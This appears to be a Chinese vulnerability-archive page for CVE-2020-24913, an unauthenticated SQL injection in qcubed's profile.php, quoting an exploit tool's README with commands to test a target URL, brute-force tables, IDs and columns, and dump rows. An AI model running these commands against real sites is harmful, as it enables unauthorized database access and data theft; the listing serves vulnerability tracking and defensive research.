目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2020-24913 PoC — Matthias Van Woensel qcubed SQL注入漏洞

来源
关联漏洞
标题: Matthias Van Woensel qcubed SQL注入漏洞 (CVE-2020-24913)
Description:Matthias Van Woensel qcubed是 (Matthias Van Woensel) 的一个应用软件。提供了一个一个PHP模型-视图-控制器快速应用程序开发框架。 qcubed (all versions including 3.1.1) 存在SQL注入漏洞,该漏洞允许未经身份验证的通过精心设计的POST请求注入SQL代码来访问数据库。
Description
automated SQL injection for QCubed profile.php file
介绍
# qcubed-exploit

You need Bun to be installed: https://bun.sh


To install dependencies:

```bash
bun install
```

To run:

```bash
# show help
bun run exploit -h

# test for vulnerability
bun run exploit vulnerable -u https://site.com/framework/assets/_core/php/profile.php

# create a session for a new target
bun run exploit create -n your_session_name -u https://site.com/framework/assets/_core/php/profile.php

# brute table
bun run exploit brute-table -n your_session_name -w path/to/wordlist.txt

# show founded tables or column of a table
bun run exploit show-table -n your_session_name
bun run exploit show-column -n your_session_name -t table_name

# brute id
bun run exploit brute-id -n your_session_name -t table_name -i 1

# brute row value
# optionally add -r for resuming the brute forcing from where it stopped
bun run exploit brute-column -n your_session_name -t table_name -c column_name -i 1

# show founded key-value pairs of a table
# optionally `-i id_value` for showing only for a particular id 
bun run exploit show-rows -n your_session_name -t table_name

```

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →